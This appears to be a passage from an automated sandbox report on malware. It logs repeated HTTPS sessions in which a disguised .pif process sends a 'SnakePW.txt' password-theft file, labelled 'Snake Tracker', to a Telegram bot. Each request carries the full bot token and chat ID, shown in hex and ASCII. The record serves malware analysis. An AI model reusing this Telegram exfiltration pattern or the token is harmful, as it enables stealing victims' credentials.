                                                                                                                      2024-12-18 15:18:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418971,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      83192.168.2.550053149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:33 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd26047d4600f9
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:33 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 30 34 37 64 34 36 30 30 66 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd26047d4600f9Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:34 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:34 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:34 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 34 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418973,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535114,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      84192.168.2.550057149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2347cf9f5e67
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 34 37 63 66 39 66 35 65 36 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2347cf9f5e67Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:36 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:35 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 35 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418976,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535115,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      85192.168.2.550058149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd236fb4dcf471
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 36 66 62 34 64 63 66 34 37 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd236fb4dcf471Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:36 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418978,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535116,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      86192.168.2.550059149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:35 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd268de6126dd3
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:35 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 36 38 64 65 36 31 32 36 64 64 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd268de6126dd3Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:16:48Client IP:
                                                                                                                      2024-12-18 15:18:36 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:36 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:36 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 37 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 36 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418979,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535116,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      87192.168.2.550065149.154.167.2204432140C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd2391582c4776
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 39 31 35 38 32 63 34 37 37 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 35 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd2391582c4776Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:05Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:37 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 38 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 37 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418982,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535117,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      88192.168.2.550066149.154.167.220443432C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd23b767e4612b
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 33 62 37 36 37 65 34 36 31 32 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 37 3a 30 30 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                                                      Data Ascii: --------------------------8dd23b767e4612bContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:124406Date and Time: 18/12/2024 / 10:17:00Client IP:
                                                                                                                      2024-12-18 15:18:38 UTC388INHTTP/1.1 200 OK
                                                                                                                      Server: nginx/1.18.0
                                                                                                                      Date: Wed, 18 Dec 2024 15:18:38 GMT
                                                                                                                      Content-Type: application/json
                                                                                                                      Content-Length: 515
                                                                                                                      Connection: close
                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                      2024-12-18 15:18:38 UTC515INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 31 38 39 38 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 36 30 38 37 36 31 33 39 34 34 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 77 61 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 53 6e 61 6b 65 69 6d 70 6f 72 74 61 6e 74 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 30 32 35 36 36 32 39 36 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4e 20 54 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 56 65 72 79 5f 69 6d 70 6f 72 74 6e 61 74 5f 67 75 79 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 34 35 33 35 31 31 38 2c 22 64 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: {"ok":true,"result":{"message_id":418984,"from":{"id":6087613944,"is_bot":true,"first_name":"Snakeway","username":"Snakeimportant_bot"},"chat":{"id":1802566296,"first_name":"N T","username":"Very_importnat_guy","type":"private"},"date":1734535118,"documen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      89192.168.2.550067149.154.167.2204436656C:\Users\Public\Libraries\xzeheenC.pif
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-18 15:18:37 UTC328OUTPOST /bot6087613944:AAHG1t4ebh3cLprMu6Ghw3xp51s7PZqRKyE/sendDocument?chat_id=1802566296&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                                                      Content-Type: multipart/form-data; boundary=------------------------8dd271102821989
                                                                                                                      Host: api.telegram.org
                                                                                                                      Content-Length: 535
                                                                                                                      2024-12-18 15:18:37 UTC535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 32 37 31 31 30 32 38 32 31 39 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 31 32 34 34 30 36 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 38 2f 31 32 2f 32 30 32 34 20 2f 20 31 30 3a 31 36 3a 34 38 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
